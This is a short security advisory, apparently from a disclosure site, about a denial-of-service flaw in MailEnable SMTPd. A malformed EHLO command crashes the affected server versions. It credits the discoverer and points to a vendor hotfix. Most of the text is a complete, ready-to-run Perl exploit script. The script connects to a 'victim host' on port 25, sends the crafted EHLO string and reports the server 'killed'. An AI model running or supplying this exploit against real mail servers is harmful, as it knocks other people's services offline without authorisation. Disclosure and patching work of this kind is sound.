MailEnable SMTPd DoS (Exploit)Summary
"MailEnable's mail server software provides a powerful, scalable hosted messaging platform for Microsoft Windows. MailEnable offers stability, unsurpassed flexibility and an extensive feature set which allows you to provide cost-effective mail services."
A bug in the SMTP protocol implementation of MailEnable's mail server causes denial of service when particular EHLO request is received.
Credit:
The information has been provided by CorryL.
The original article can be found at: http://www.x0n3-h4ck.org/index.php?name=news&article=68
Details
Vulnerable Systems:
* MailEnable SMTPd Enterprise versions 1.04 and prior
* MailEnable SMTPd Professional versions 1.54 and prior
Example:
The following EHLO request will cause the server to stop responding:
EHLO x99
Exploit:
#!/usr/bin/perl
##############################################
#MailEnable (Enterprise <= 1.04)-(Professional <
# = 1.54 SMTPd remote DOS exploit
#
#
#this tools causes the crash of the demon SMTP of mailenable
#the bug and' caused he/she knows an unicode string sent to the command
#EHLO
#
#BUG discovered By CorryL
#Coded by CorryL
# info: www.x0n3-h4ck.org
##############################################
use IO::Socket;
use Getopt::Std; getopts('h:', \%args);
if (defined($args{'h'})) { $host = $args{'h'}; }
print STDERR "\n-=[MailEnable (Enterprise & Professional) SMTPd remote DOS exploit]=-\n";
print STDERR "-=[ ]=-\n";
print STDERR "-=[ Discovered & Coded by CorryL info:www.x0n3-h4ck.org]=-\n";
print STDERR "-=[ irc.xoned.net #x0n3-h4ck corryl80[at]gmail.com]=-\n\n";
if (!defined($host)) {
Usage();
}
$bof = "\0x99";
print "[+]Connecting to the Host $host\n";
$socket = new IO::Socket::INET (PeerAddr => "$host",
PeerPort => 25,
Proto => 'tcp');
die unless $socket;
print "[+]Sending Unicode String\n";
print $socket "EHLO $bof\r\n";
print "[+]Server is Killed!\n";
close;
sub Usage {
print STDERR "Usage:
-h Victim host.\n\n";
exit;
}
Patch Availability:
Download a hotfix http://www.mailenable.com/hotfix.